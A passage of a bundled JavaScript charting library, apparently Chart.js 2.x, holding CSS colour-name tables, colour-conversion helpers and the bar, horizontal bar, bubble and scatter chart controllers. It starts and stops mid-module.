lightgoldenrodyellow: [250, 250, 210],
lightgray: [211, 211, 211],
lightgreen: [144, 238, 144],
lightgrey: [211, 211, 211],
lightpink: [255, 182, 193],
lightsalmon: [255, 160, 122],
lightseagreen: [32, 178, 170],
lightskyblue: [135, 206, 250],
lightslategray: [119, 136, 153],
lightslategrey: [119, 136, 153],
lightsteelblue: [176, 196, 222],
lightyellow: [255, 255, 224],
lime: [0, 255, 0],
limegreen: [50, 205, 50],
linen: [250, 240, 230],
magenta: [255, 0, 255],
maroon: [128, 0, 0],
mediumaquamarine: [102, 205, 170],
mediumblue: [0, 0, 205],
mediumorchid: [186, 85, 211],
mediumpurple: [147, 112, 219],
mediumseagreen: [60, 179, 113],
mediumslateblue: [123, 104, 238],
mediumspringgreen: [0, 250, 154],
mediumturquoise: [72, 209, 204],
mediumvioletred: [199, 21, 133],
midnightblue: [25, 25, 112],
mintcream: [245, 255, 250],
mistyrose: [255, 228, 225],
moccasin: [255, 228, 181],
navajowhite: [255, 222, 173],
navy: [0, 0, 128],
oldlace: [253, 245, 230],
olive: [128, 128, 0],
olivedrab: [107, 142, 35],
orange: [255, 165, 0],
orangered: [255, 69, 0],
orchid: [218, 112, 214],
palegoldenrod: [238, 232, 170],
palegreen: [152, 251, 152],
paleturquoise: [175, 238, 238],
palevioletred: [219, 112, 147],
papayawhip: [255, 239, 213],
peachpuff: [255, 218, 185],
peru: [205, 133, 63],
pink: [255, 192, 203],
plum: [221, 160, 221],
powderblue: [176, 224, 230],
purple: [128, 0, 128],
rebeccapurple: [102, 51, 153],
red: [255, 0, 0],
rosybrown: [188, 143, 143],
royalblue: [65, 105, 225],
saddlebrown: [139, 69, 19],
salmon: [250, 128, 114],
sandybrown: [244, 164, 96],
seagreen: [46, 139, 87],
seashell: [255, 245, 238],
sienna: [160, 82, 45],
silver: [192, 192, 192],
skyblue: [135, 206, 235],
slateblue: [106, 90, 205],
slategray: [112, 128, 144],
slategrey: [112, 128, 144],
snow: [255, 250, 250],
springgreen: [0, 255, 127],
steelblue: [70, 130, 180],
tan: [210, 180, 140],
teal: [0, 128, 128],
thistle: [216, 191, 216],
tomato: [255, 99, 71],
turquoise: [64, 224, 208],
violet: [238, 130, 238],
wheat: [245, 222, 179],
white: [255, 255, 255],
whitesmoke: [245, 245, 245],
yellow: [255, 255, 0],
yellowgreen: [154, 205, 50]
};
var reverseKeywords = {};
for (var key in cssKeywords) {
reverseKeywords[JSON.stringify(cssKeywords[key])] = key;
}
}, {}], 5: [function (require, module, exports) {
var conversions = require(4);
var convert = function () {
return new Converter();
}
for (var func in conversions) {
// export Raw versions
convert[func + "Raw"] = (function (func) {
// accept array or plain args
return function (arg) {
if (typeof arg == "number")
arg = Array.prototype.slice.call(arguments);
return conversions[func](arg);
}
})(func);
var pair = /(\w+)2(\w+)/.exec(func),
from = pair[1],
to = pair[2];
// export rgb2hsl and ["rgb"]["hsl"]
convert[from] = convert[from] || {};
convert[from][to] = convert[func] = (function (func) {
return function (arg) {
if (typeof arg == "number")
arg = Array.prototype.slice.call(arguments);
var val = conversions[func](arg);
if (typeof val == "string" || val === undefined)
return val; // keyword
for (var i = 0; i < val.length; i++)
val[i] = Math.round(val[i]);
return val;
}
})(func);
}
/* Converter does lazy conversion and caching */
var Converter = function () {
this.convs = {};
};
/* Either get the values for a space or
set the values for a space, depending on args */
Converter.prototype.routeSpace = function (space, args) {
var values = args[0];
if (values === undefined) {
// color.rgb()
return this.getValues(space);
}
// color.rgb(10, 10, 10)
if (typeof values == "number") {
values = Array.prototype.slice.call(args);
}
return this.setValues(space, values);
};
/* Set the values for a space, invalidating cache */
Converter.prototype.setValues = function (space, values) {
this.space = space;
this.convs = {};
this.convs[space] = values;
return this;
};
/* Get the values for a space. If there's already
a conversion for the space, fetch it, otherwise
compute it */
Converter.prototype.getValues = function (space) {
var vals = this.convs[space];
if (!vals) {
var fspace = this.space,
from = this.convs[fspace];
vals = convert[fspace][space](from);
this.convs[space] = vals;
}
return vals;
};
["rgb", "hsl", "hsv", "cmyk", "keyword"].forEach(function (space) {
Converter.prototype[space] = function (vals) {
return this.routeSpace(space, arguments);
}
});
module.exports = convert;
}, {"4": 4}], 6: [function (require, module, exports) {
module.exports = {
"aliceblue": [240, 248, 255],
"antiquewhite": [250, 235, 215],
"aqua": [0, 255, 255],
"aquamarine": [127, 255, 212],
"azure": [240, 255, 255],
"beige": [245, 245, 220],
"bisque": [255, 228, 196],
"black": [0, 0, 0],
"blanchedalmond": [255, 235, 205],
"blue": [0, 0, 255],
"blueviolet": [138, 43, 226],
"brown": [165, 42, 42],
"burlywood": [222, 184, 135],
"cadetblue": [95, 158, 160],
"chartreuse": [127, 255, 0],
"chocolate": [210, 105, 30],
"coral": [255, 127, 80],
"cornflowerblue": [100, 149, 237],
"cornsilk": [255, 248, 220],
"crimson": [220, 20, 60],
"cyan": [0, 255, 255],
"darkblue": [0, 0, 139],
"darkcyan": [0, 139, 139],
"darkgoldenrod": [184, 134, 11],
"darkgray": [169, 169, 169],
"darkgreen": [0, 100, 0],
"darkgrey": [169, 169, 169],
"darkkhaki": [189, 183, 107],
"darkmagenta": [139, 0, 139],
"darkolivegreen": [85, 107, 47],
"darkorange": [255, 140, 0],
"darkorchid": [153, 50, 204],
"darkred": [139, 0, 0],
"darksalmon": [233, 150, 122],
"darkseagreen": [143, 188, 143],
"darkslateblue": [72, 61, 139],
"darkslategray": [47, 79, 79],
"darkslategrey": [47, 79, 79],
"darkturquoise": [0, 206, 209],
"darkviolet": [148, 0, 211],
"deeppink": [255, 20, 147],
"deepskyblue": [0, 191, 255],
"dimgray": [105, 105, 105],
"dimgrey": [105, 105, 105],
"dodgerblue": [30, 144, 255],
"firebrick": [178, 34, 34],
"floralwhite": [255, 250, 240],
"forestgreen": [34, 139, 34],
"fuchsia": [255, 0, 255],
"gainsboro": [220, 220, 220],
"ghostwhite": [248, 248, 255],
"gold": [255, 215, 0],
"goldenrod": [218, 165, 32],
"gray": [128, 128, 128],
"green": [0, 128, 0],
"greenyellow": [173, 255, 47],
"grey": [128, 128, 128],
"honeydew": [240, 255, 240],
"hotpink": [255, 105, 180],
"indianred": [205, 92, 92],
"indigo": [75, 0, 130],
"ivory": [255, 255, 240],
"khaki": [240, 230, 140],
"lavender": [230, 230, 250],
"lavenderblush": [255, 240, 245],
"lawngreen": [124, 252, 0],
"lemonchiffon": [255, 250, 205],
"lightblue": [173, 216, 230],
"lightcoral": [240, 128, 128],
"lightcyan": [224, 255, 255],
"lightgoldenrodyellow": [250, 250, 210],
"lightgray": [211, 211, 211],
"lightgreen": [144, 238, 144],
"lightgrey": [211, 211, 211],
"lightpink": [255, 182, 193],
"lightsalmon": [255, 160, 122],
"lightseagreen": [32, 178, 170],
"lightskyblue": [135, 206, 250],
"lightslategray": [119, 136, 153],
"lightslategrey": [119, 136, 153],
"lightsteelblue": [176, 196, 222],
"lightyellow": [255, 255, 224],
"lime": [0, 255, 0],
"limegreen": [50, 205, 50],
"linen": [250, 240, 230],
"magenta": [255, 0, 255],
"maroon": [128, 0, 0],
"mediumaquamarine": [102, 205, 170],
"mediumblue": [0, 0, 205],
"mediumorchid": [186, 85, 211],
"mediumpurple": [147, 112, 219],
"mediumseagreen": [60, 179, 113],
"mediumslateblue": [123, 104, 238],
"mediumspringgreen": [0, 250, 154],
"mediumturquoise": [72, 209, 204],
"mediumvioletred": [199, 21, 133],
"midnightblue": [25, 25, 112],
"mintcream": [245, 255, 250],
"mistyrose": [255, 228, 225],
"moccasin": [255, 228, 181],
"navajowhite": [255, 222, 173],
"navy": [0, 0, 128],
"oldlace": [253, 245, 230],
"olive": [128, 128, 0],
"olivedrab": [107, 142, 35],
"orange": [255, 165, 0],
"orangered": [255, 69, 0],
"orchid": [218, 112, 214],
"palegoldenrod": [238, 232, 170],
"palegreen": [152, 251, 152],
"paleturquoise": [175, 238, 238],
"palevioletred": [219, 112, 147],
"papayawhip": [255, 239, 213],
"peachpuff": [255, 218, 185],
"peru": [205, 133, 63],
"pink": [255, 192, 203],
"plum": [221, 160, 221],
"powderblue": [176, 224, 230],
"purple": [128, 0, 128],
"rebeccapurple": [102, 51, 153],
"red": [255, 0, 0],
"rosybrown": [188, 143, 143],
"royalblue": [65, 105, 225],
"saddlebrown": [139, 69, 19],
"salmon": [250, 128, 114],
"sandybrown": [244, 164, 96],
"seagreen": [46, 139, 87],
"seashell": [255, 245, 238],
"sienna": [160, 82, 45],
"silver": [192, 192, 192],
"skyblue": [135, 206, 235],
"slateblue": [106, 90, 205],
"slategray": [112, 128, 144],
"slategrey": [112, 128, 144],
"snow": [255, 250, 250],
"springgreen": [0, 255, 127],
"steelblue": [70, 130, 180],
"tan": [210, 180, 140],
"teal": [0, 128, 128],
"thistle": [216, 191, 216],
"tomato": [255, 99, 71],
"turquoise": [64, 224, 208],
"violet": [238, 130, 238],
"wheat": [245, 222, 179],
"white": [255, 255, 255],
"whitesmoke": [245, 245, 245],
"yellow": [255, 255, 0],
"yellowgreen": [154, 205, 50]
};
}, {}], 7: [function (require, module, exports) {
/**
* @namespace Chart
*/
var Chart = require(28)();
require(26)(Chart);
require(22)(Chart);
require(25)(Chart);
require(21)(Chart);
require(23)(Chart);
require(24)(Chart);
require(29)(Chart);
require(33)(Chart);
require(31)(Chart);
require(34)(Chart);
require(32)(Chart);
require(35)(Chart);
require(30)(Chart);
require(27)(Chart);
require(36)(Chart);
require(37)(Chart);
require(38)(Chart);
require(39)(Chart);
require(40)(Chart);
require(43)(Chart);
require(41)(Chart);
require(42)(Chart);
require(44)(Chart);
require(45)(Chart);
require(46)(Chart);
// Controllers must be loaded after elements
// See Chart.core.datasetController.dataElementType
require(15)(Chart);
require(16)(Chart);
require(17)(Chart);
require(18)(Chart);
require(19)(Chart);
require(20)(Chart);
require(8)(Chart);
require(9)(Chart);
require(10)(Chart);
require(11)(Chart);
require(12)(Chart);
require(13)(Chart);
require(14)(Chart);
window.Chart = module.exports = Chart;
}, {
"10": 10,
"11": 11,
"12": 12,
"13": 13,
"14": 14,
"15": 15,
"16": 16,
"17": 17,
"18": 18,
"19": 19,
"20": 20,
"21": 21,
"22": 22,
"23": 23,
"24": 24,
"25": 25,
"26": 26,
"27": 27,
"28": 28,
"29": 29,
"30": 30,
"31": 31,
"32": 32,
"33": 33,
"34": 34,
"35": 35,
"36": 36,
"37": 37,
"38": 38,
"39": 39,
"40": 40,
"41": 41,
"42": 42,
"43": 43,
"44": 44,
"45": 45,
"46": 46,
"8": 8,
"9": 9
}], 8: [function (require, module, exports) {
'use strict';
module.exports = function (Chart) {
Chart.Bar = function (context, config) {
config.type = 'bar';
return new Chart(context, config);
};
};
}, {}], 9: [function (require, module, exports) {
'use strict';
module.exports = function (Chart) {
Chart.Bubble = function (context, config) {
config.type = 'bubble';
return new Chart(context, config);
};
};
}, {}], 10: [function (require, module, exports) {
'use strict';
module.exports = function (Chart) {
Chart.Doughnut = function (context, config) {
config.type = 'doughnut';
return new Chart(context, config);
};
};
}, {}], 11: [function (require, module, exports) {
'use strict';
module.exports = function (Chart) {
Chart.Line = function (context, config) {
config.type = 'line';
return new Chart(context, config);
};
};
}, {}], 12: [function (require, module, exports) {
'use strict';
module.exports = function (Chart) {
Chart.PolarArea = function (context, config) {
config.type = 'polarArea';
return new Chart(context, config);
};
};
}, {}], 13: [function (require, module, exports) {
'use strict';
module.exports = function (Chart) {
Chart.Radar = function (context, config) {
config.type = 'radar';
return new Chart(context, config);
};
};
}, {}], 14: [function (require, module, exports) {
'use strict';
module.exports = function (Chart) {
var defaultConfig = {
hover: {
mode: 'single'
},
scales: {
xAxes: [{
type: 'linear', // scatter should not use a category axis
position: 'bottom',
id: 'x-axis-1' // need an ID so datasets can reference the scale
}],
yAxes: [{
type: 'linear',
position: 'left',
id: 'y-axis-1'
}]
},
tooltips: {
callbacks: {
title: function () {
// Title doesn't make sense for scatter since we format the data as a point
return '';
},
label: function (tooltipItem) {
return '(' + tooltipItem.xLabel + ', ' + tooltipItem.yLabel + ')';
}
}
}
};
// Register the default config for this type
Chart.defaults.scatter = defaultConfig;
// Scatter charts use line controllers
Chart.controllers.scatter = Chart.controllers.line;
Chart.Scatter = function (context, config) {
config.type = 'scatter';
return new Chart(context, config);
};
};
}, {}], 15: [function (require, module, exports) {
'use strict';
module.exports = function (Chart) {
var helpers = Chart.helpers;
Chart.defaults.bar = {
hover: {
mode: 'label'
},
scales: {
xAxes: [{
type: 'category',
// Specific to Bar Controller
categoryPercentage: 0.8,
barPercentage: 0.9,
// grid line settings
gridLines: {
offsetGridLines: true
}
}],
yAxes: [{
type: 'linear'
}]
}
};
Chart.controllers.bar = Chart.DatasetController.extend({
dataElementType: Chart.elements.Rectangle,
initialize: function (chart, datasetIndex) {
Chart.DatasetController.prototype.initialize.call(this, chart, datasetIndex);
// Use this to indicate that this is a bar dataset.
this.getMeta().bar = true;
},
// Get the number of datasets that display bars. We use this to correctly calculate the bar width
getBarCount: function () {
var me = this;
var barCount = 0;
helpers.each(me.chart.data.datasets, function (dataset, datasetIndex) {
var meta = me.chart.getDatasetMeta(datasetIndex);
if (meta.bar && me.chart.isDatasetVisible(datasetIndex)) {
++barCount;
}
}, me);
return barCount;
},
update: function (reset) {
var me = this;
helpers.each(me.getMeta().data, function (rectangle, index) {
me.updateElement(rectangle, index, reset);
}, me);
},
updateElement: function (rectangle, index, reset) {
var me = this;
var meta = me.getMeta();
var xScale = me.getScaleForId(meta.xAxisID);
var yScale = me.getScaleForId(meta.yAxisID);
var scaleBase = yScale.getBasePixel();
var rectangleElementOptions = me.chart.options.elements.rectangle;
var custom = rectangle.custom || {};
var dataset = me.getDataset();
rectangle._xScale = xScale;
rectangle._yScale = yScale;
rectangle._datasetIndex = me.index;
rectangle._index = index;
var ruler = me.getRuler(index);
rectangle._model = {
x: me.calculateBarX(index, me.index, ruler),
y: reset ? scaleBase : me.calculateBarY(index, me.index),
// Tooltip
label: me.chart.data.labels[index],
datasetLabel: dataset.label,
// Appearance
base: reset ? scaleBase : me.calculateBarBase(me.index, index),
width: me.calculateBarWidth(ruler),
backgroundColor: custom.backgroundColor ? custom.backgroundColor : helpers.getValueAtIndexOrDefault(dataset.backgroundColor, index, rectangleElementOptions.backgroundColor),
borderSkipped: custom.borderSkipped ? custom.borderSkipped : rectangleElementOptions.borderSkipped,
borderColor: custom.borderColor ? custom.borderColor : helpers.getValueAtIndexOrDefault(dataset.borderColor, index, rectangleElementOptions.borderColor),
borderWidth: custom.borderWidth ? custom.borderWidth : helpers.getValueAtIndexOrDefault(dataset.borderWidth, index, rectangleElementOptions.borderWidth)
};
rectangle.pivot();
},
calculateBarBase: function (datasetIndex, index) {
var me = this;
var meta = me.getMeta();
var yScale = me.getScaleForId(meta.yAxisID);
var base = 0;
if (yScale.options.stacked) {
var chart = me.chart;
var datasets = chart.data.datasets;
var value = Number(datasets[datasetIndex].data[index]);
for (var i = 0; i < datasetIndex; i++) {
var currentDs = datasets[i];
var currentDsMeta = chart.getDatasetMeta(i);
if (currentDsMeta.bar && currentDsMeta.yAxisID === yScale.id && chart.isDatasetVisible(i)) {
var currentVal = Number(currentDs.data[index]);
base += value < 0 ? Math.min(currentVal, 0) : Math.max(currentVal, 0);
}
}
return yScale.getPixelForValue(base);
}
return yScale.getBasePixel();
},
getRuler: function (index) {
var me = this;
var meta = me.getMeta();
var xScale = me.getScaleForId(meta.xAxisID);
var datasetCount = me.getBarCount();
var tickWidth;
if (xScale.options.type === 'category') {
tickWidth = xScale.getPixelForTick(index + 1) - xScale.getPixelForTick(index);
} else {
// Average width
tickWidth = xScale.width / xScale.ticks.length;
}
var categoryWidth = tickWidth * xScale.options.categoryPercentage;
var categorySpacing = (tickWidth - (tickWidth * xScale.options.categoryPercentage)) / 2;
var fullBarWidth = categoryWidth / datasetCount;
if (xScale.ticks.length !== me.chart.data.labels.length) {
var perc = xScale.ticks.length / me.chart.data.labels.length;
fullBarWidth = fullBarWidth * perc;
}
var barWidth = fullBarWidth * xScale.options.barPercentage;
var barSpacing = fullBarWidth - (fullBarWidth * xScale.options.barPercentage);
return {
datasetCount: datasetCount,
tickWidth: tickWidth,
categoryWidth: categoryWidth,
categorySpacing: categorySpacing,
fullBarWidth: fullBarWidth,
barWidth: barWidth,
barSpacing: barSpacing
};
},
calculateBarWidth: function (ruler) {
var xScale = this.getScaleForId(this.getMeta().xAxisID);
if (xScale.options.barThickness) {
return xScale.options.barThickness;
}
return xScale.options.stacked ? ruler.categoryWidth : ruler.barWidth;
},
// Get bar index from the given dataset index accounting for the fact that not all bars are visible
getBarIndex: function (datasetIndex) {
var barIndex = 0;
var meta, j;
for (j = 0; j < datasetIndex; ++j) {
meta = this.chart.getDatasetMeta(j);
if (meta.bar && this.chart.isDatasetVisible(j)) {
++barIndex;
}
}
return barIndex;
},
calculateBarX: function (index, datasetIndex, ruler) {
var me = this;
var meta = me.getMeta();
var xScale = me.getScaleForId(meta.xAxisID);
var barIndex = me.getBarIndex(datasetIndex);
var leftTick = xScale.getPixelForValue(null, index, datasetIndex, me.chart.isCombo);
leftTick -= me.chart.isCombo ? (ruler.tickWidth / 2) : 0;
if (xScale.options.stacked) {
return leftTick + (ruler.categoryWidth / 2) + ruler.categorySpacing;
}
return leftTick +
(ruler.barWidth / 2) +
ruler.categorySpacing +
(ruler.barWidth * barIndex) +
(ruler.barSpacing / 2) +
(ruler.barSpacing * barIndex);
},
calculateBarY: function (index, datasetIndex) {
var me = this;
var meta = me.getMeta();
var yScale = me.getScaleForId(meta.yAxisID);
var value = Number(me.getDataset().data[index]);
if (yScale.options.stacked) {
var sumPos = 0,
sumNeg = 0;
for (var i = 0; i < datasetIndex; i++) {
var ds = me.chart.data.datasets[i];
var dsMeta = me.chart.getDatasetMeta(i);
if (dsMeta.bar && dsMeta.yAxisID === yScale.id && me.chart.isDatasetVisible(i)) {
var stackedVal = Number(ds.data[index]);
if (stackedVal < 0) {
sumNeg += stackedVal || 0;
} else {
sumPos += stackedVal || 0;
}
}
}
if (value < 0) {
return yScale.getPixelForValue(sumNeg + value);
}
return yScale.getPixelForValue(sumPos + value);
}
return yScale.getPixelForValue(value);
},
draw: function (ease) {
var me = this;
var easingDecimal = ease || 1;
var metaData = me.getMeta().data;
var dataset = me.getDataset();
var i, len;
for (i = 0, len = metaData.length; i < len; ++i) {
var d = dataset.data[i];
if (d !== null && d !== undefined && !isNaN(d)) {
metaData[i].transition(easingDecimal).draw();
}
}
},
setHoverStyle: function (rectangle) {
var dataset = this.chart.data.datasets[rectangle._datasetIndex];
var index = rectangle._index;
var custom = rectangle.custom || {};
var model = rectangle._model;
model.backgroundColor = custom.hoverBackgroundColor ? custom.hoverBackgroundColor : helpers.getValueAtIndexOrDefault(dataset.hoverBackgroundColor, index, helpers.getHoverColor(model.backgroundColor));
model.borderColor = custom.hoverBorderColor ? custom.hoverBorderColor : helpers.getValueAtIndexOrDefault(dataset.hoverBorderColor, index, helpers.getHoverColor(model.borderColor));
model.borderWidth = custom.hoverBorderWidth ? custom.hoverBorderWidth : helpers.getValueAtIndexOrDefault(dataset.hoverBorderWidth, index, model.borderWidth);
},
removeHoverStyle: function (rectangle) {
var dataset = this.chart.data.datasets[rectangle._datasetIndex];
var index = rectangle._index;
var custom = rectangle.custom || {};
var model = rectangle._model;
var rectangleElementOptions = this.chart.options.elements.rectangle;
model.backgroundColor = custom.backgroundColor ? custom.backgroundColor : helpers.getValueAtIndexOrDefault(dataset.backgroundColor, index, rectangleElementOptions.backgroundColor);
model.borderColor = custom.borderColor ? custom.borderColor : helpers.getValueAtIndexOrDefault(dataset.borderColor, index, rectangleElementOptions.borderColor);
model.borderWidth = custom.borderWidth ? custom.borderWidth : helpers.getValueAtIndexOrDefault(dataset.borderWidth, index, rectangleElementOptions.borderWidth);
}
});
// including horizontalBar in the bar file, instead of a file of its own
// it extends bar (like pie extends doughnut)
Chart.defaults.horizontalBar = {
hover: {
mode: 'label'
},
scales: {
xAxes: [{
type: 'linear',
position: 'bottom'
}],
yAxes: [{
position: 'left',
type: 'category',
// Specific to Horizontal Bar Controller
categoryPercentage: 0.8,
barPercentage: 0.9,
// grid line settings
gridLines: {
offsetGridLines: true
}
}]
},
elements: {
rectangle: {
borderSkipped: 'left'
}
},
tooltips: {
callbacks: {
title: function (tooltipItems, data) {
// Pick first xLabel for now
var title = '';
if (tooltipItems.length > 0) {
if (tooltipItems[0].yLabel) {
title = tooltipItems[0].yLabel;
} else if (data.labels.length > 0 && tooltipItems[0].index < data.labels.length) {
title = data.labels[tooltipItems[0].index];
}
}
return title;
},
label: function (tooltipItem, data) {
var datasetLabel = data.datasets[tooltipItem.datasetIndex].label || '';
return datasetLabel + ': ' + tooltipItem.xLabel;
}
}
}
};
Chart.controllers.horizontalBar = Chart.controllers.bar.extend({
updateElement: function (rectangle, index, reset) {
var me = this;
var meta = me.getMeta();
var xScale = me.getScaleForId(meta.xAxisID);
var yScale = me.getScaleForId(meta.yAxisID);
var scaleBase = xScale.getBasePixel();
var custom = rectangle.custom || {};
var dataset = me.getDataset();
var rectangleElementOptions = me.chart.options.elements.rectangle;
rectangle._xScale = xScale;
rectangle._yScale = yScale;
rectangle._datasetIndex = me.index;
rectangle._index = index;
var ruler = me.getRuler(index);
rectangle._model = {
x: reset ? scaleBase : me.calculateBarX(index, me.index),
y: me.calculateBarY(index, me.index, ruler),
// Tooltip
label: me.chart.data.labels[index],
datasetLabel: dataset.label,
// Appearance
base: reset ? scaleBase : me.calculateBarBase(me.index, index),
height: me.calculateBarHeight(ruler),
backgroundColor: custom.backgroundColor ? custom.backgroundColor : helpers.getValueAtIndexOrDefault(dataset.backgroundColor, index, rectangleElementOptions.backgroundColor),
borderSkipped: custom.borderSkipped ? custom.borderSkipped : rectangleElementOptions.borderSkipped,
borderColor: custom.borderColor ? custom.borderColor : helpers.getValueAtIndexOrDefault(dataset.borderColor, index, rectangleElementOptions.borderColor),
borderWidth: custom.borderWidth ? custom.borderWidth : helpers.getValueAtIndexOrDefault(dataset.borderWidth, index, rectangleElementOptions.borderWidth)
};
rectangle.draw = function () {
var ctx = this._chart.ctx;
var vm = this._view;
var halfHeight = vm.height / 2,
topY = vm.y - halfHeight,
bottomY = vm.y + halfHeight,
right = vm.base - (vm.base - vm.x),
halfStroke = vm.borderWidth / 2;
// Canvas doesn't allow us to stroke inside the width so we can
// adjust the sizes to fit if we're setting a stroke on the line
if (vm.borderWidth) {
topY += halfStroke;
bottomY -= halfStroke;
right += halfStroke;
}
ctx.beginPath();
ctx.fillStyle = vm.backgroundColor;
ctx.strokeStyle = vm.borderColor;
ctx.lineWidth = vm.borderWidth;
// Corner points, from bottom-left to bottom-right clockwise
// | 1 2 |
// | 0 3 |
var corners = [
[vm.base, bottomY],
[vm.base, topY],
[right, topY],
[right, bottomY]
];
// Find first (starting) corner with fallback to 'bottom'
var borders = ['bottom', 'left', 'top', 'right'];
var startCorner = borders.indexOf(vm.borderSkipped, 0);
if (startCorner === -1) {
startCorner = 0;
}
function cornerAt(cornerIndex) {
return corners[(startCorner + cornerIndex) % 4];
}
// Draw rectangle from 'startCorner'
ctx.moveTo.apply(ctx, cornerAt(0));
for (var i = 1; i < 4; i++) {
ctx.lineTo.apply(ctx, cornerAt(i));
}
ctx.fill();
if (vm.borderWidth) {
ctx.stroke();
}
};
rectangle.pivot();
},
calculateBarBase: function (datasetIndex, index) {
var me = this;
var meta = me.getMeta();
var xScale = me.getScaleForId(meta.xAxisID);
var base = 0;
if (xScale.options.stacked) {
var chart = me.chart;
var datasets = chart.data.datasets;
var value = Number(datasets[datasetIndex].data[index]);
for (var i = 0; i < datasetIndex; i++) {
var currentDs = datasets[i];
var currentDsMeta = chart.getDatasetMeta(i);
if (currentDsMeta.bar && currentDsMeta.xAxisID === xScale.id && chart.isDatasetVisible(i)) {
var currentVal = Number(currentDs.data[index]);
base += value < 0 ? Math.min(currentVal, 0) : Math.max(currentVal, 0);
}
}
return xScale.getPixelForValue(base);
}
return xScale.getBasePixel();
},
getRuler: function (index) {
var me = this;
var meta = me.getMeta();
var yScale = me.getScaleForId(meta.yAxisID);
var datasetCount = me.getBarCount();
var tickHeight;
if (yScale.options.type === 'category') {
tickHeight = yScale.getPixelForTick(index + 1) - yScale.getPixelForTick(index);
} else {
// Average width
tickHeight = yScale.width / yScale.ticks.length;
}
var categoryHeight = tickHeight * yScale.options.categoryPercentage;
var categorySpacing = (tickHeight - (tickHeight * yScale.options.categoryPercentage)) / 2;
var fullBarHeight = categoryHeight / datasetCount;
if (yScale.ticks.length !== me.chart.data.labels.length) {
var perc = yScale.ticks.length / me.chart.data.labels.length;
fullBarHeight = fullBarHeight * perc;
}
var barHeight = fullBarHeight * yScale.options.barPercentage;
var barSpacing = fullBarHeight - (fullBarHeight * yScale.options.barPercentage);
return {
datasetCount: datasetCount,
tickHeight: tickHeight,
categoryHeight: categoryHeight,
categorySpacing: categorySpacing,
fullBarHeight: fullBarHeight,
barHeight: barHeight,
barSpacing: barSpacing
};
},
calculateBarHeight: function (ruler) {
var me = this;
var yScale = me.getScaleForId(me.getMeta().yAxisID);
if (yScale.options.barThickness) {
return yScale.options.barThickness;
}
return yScale.options.stacked ? ruler.categoryHeight : ruler.barHeight;
},
calculateBarX: function (index, datasetIndex) {
var me = this;
var meta = me.getMeta();
var xScale = me.getScaleForId(meta.xAxisID);
var value = Number(me.getDataset().data[index]);
if (xScale.options.stacked) {
var sumPos = 0,
sumNeg = 0;
for (var i = 0; i < datasetIndex; i++) {
var ds = me.chart.data.datasets[i];
var dsMeta = me.chart.getDatasetMeta(i);
if (dsMeta.bar && dsMeta.xAxisID === xScale.id && me.chart.isDatasetVisible(i)) {
var stackedVal = Number(ds.data[index]);
if (stackedVal < 0) {
sumNeg += stackedVal || 0;
} else {
sumPos += stackedVal || 0;
}
}
}
if (value < 0) {
return xScale.getPixelForValue(sumNeg + value);
}
return xScale.getPixelForValue(sumPos + value);
}
return xScale.getPixelForValue(value);
},
calculateBarY: function (index, datasetIndex, ruler) {
var me = this;
var meta = me.getMeta();
var yScale = me.getScaleForId(meta.yAxisID);
var barIndex = me.getBarIndex(datasetIndex);
var topTick = yScale.getPixelForValue(null, index, datasetIndex, me.chart.isCombo);
topTick -= me.chart.isCombo ? (ruler.tickHeight / 2) : 0;
if (yScale.options.stacked) {
return topTick + (ruler.categoryHeight / 2) + ruler.categorySpacing;
}
return topTick +
(ruler.barHeight / 2) +
ruler.categorySpacing +
(ruler.barHeight * barIndex) +
(ruler.barSpacing / 2) +
(ruler.barSpacing * barIndex);
}
});
};
}, {}], 16: [function (require, module, exports) {
'use strict';
module.exports = function (Chart) {
var helpers = Chart.helpers;
Chart.defaults.bubble = {
hover: {
mode: 'single'
},
scales: {
xAxes: [{
type: 'linear', // bubble should probably use a linear scale by default
position: 'bottom',
id: 'x-axis-0' // need an ID so datasets can reference the scale
}],
yAxes: [{
type: 'linear',
position: 'left',
id: 'y-axis-0'
}]
},
tooltips: {
callbacks: {
title: function () {
// Title doesn't make sense for scatter since we format the data as a point
return '';
},
label: function (tooltipItem, data) {
var datasetLabel = data.datasets[tooltipItem.datasetIndex].label || '';
var dataPoint = data.datasets[tooltipItem.datasetIndex].data[tooltipItem.index];
return datasetLabel + ': (' + tooltipItem.xLabel + ', ' + tooltipItem.yLabel + ', ' + dataPoint.r + ')';
}
}
}
};
Chart.controllers.bubble = Chart.DatasetController.extend({
dataElementType: Chart.elements.Point,
update: function (reset) {
var me = this;
var meta = me.getMeta();
var points = meta.data;
// Update Points
helpers.each(points, function (point, index) {
me.updateElement(point, index, reset);
});
},
updateElement: function (point, index, reset) {
var me = this;
var meta = me.getMeta();
var xScale = me.getScaleForId(meta.xAxisID);
var yScale = me.getScaleForId(meta.yAxisID);
var custom = point.custom || {};
var dataset = me.getDataset();
var data = dataset.data[index];
var pointElementOptions = me.chart.options.elements.point;
var dsIndex = me.index;
helpers.extend(point, {
// Utility
_xScale: xScale,
_yScale: yScale,
_datasetIndex: dsIndex,
_index: index,
// Desired view properties
_model: {
x: reset ? xScale.getPixelForDecimal(0.5) : xScale.getPixelForValue(typeof data === 'object' ? data : NaN, index, dsIndex, me.chart.isCombo),
y: reset ? yScale.getBasePixel() : yScale.getPixelForValue(data, index, dsIndex),
// Appearance
radius: reset ? 0 : custom.radius ? custom.radius : me.getRadius(data),
// Tooltip
hitRadius: custom.hitRadius ? custom.hitRadius : helpers.getValueAtIndexOrDefault(dataset.hitRadius, index, pointElementOptions.hitRadius)
}
});
// Trick to reset the styles of the point
Chart.DatasetController.prototype.removeHoverStyle.call(me, point, pointElementOptions);
var model = point._model;
model.skip = custom.skip ? custom.skip : (isNaN(model.x) || isNaN(model.y));
point.pivot();
},
getRadius: function (value) {
return value.r || this.chart.options.elements.point.radius;
},
setHoverStyle: function (point) {
var me = this;
Chart.DatasetController.prototype.setHoverStyle.call(me, point);
// Radius
var dataset = me.chart.data.datasets[point._datasetIndex];
var index = point._index;
var custom = point.custom || {};
var model = point._model;
model.radius = custom.hoverRadius ? custom.hoverRadius : (helpers.getValueAtIndexOrDefault(dataset.hoverRadius, index, me.chart.options.elements.point.hoverRadius)) + me.getRadius(dataset.data[index]);
},
removeHoverStyle: function (point) {
var me = this;
Chart.DatasetController.prototype.removeHoverStyle.call(me, point, me.chart.options.elements.point);
var dataVal = me.chart.data.datasets[point._datasetIndex].data[point._index];
var custom = point.custom || {};
var model = point._model;
model.radius = custom.radius ? custom.radius : me.getRadius(dataVal);
}
});
};
}, {}], 17: [function (require, module, exports) {
'use strict';
module.exports = function (Chart) {
var helpers = Chart.helpers,
defaults = Chart.defaults;
defaults.doughnut = {
animation: {
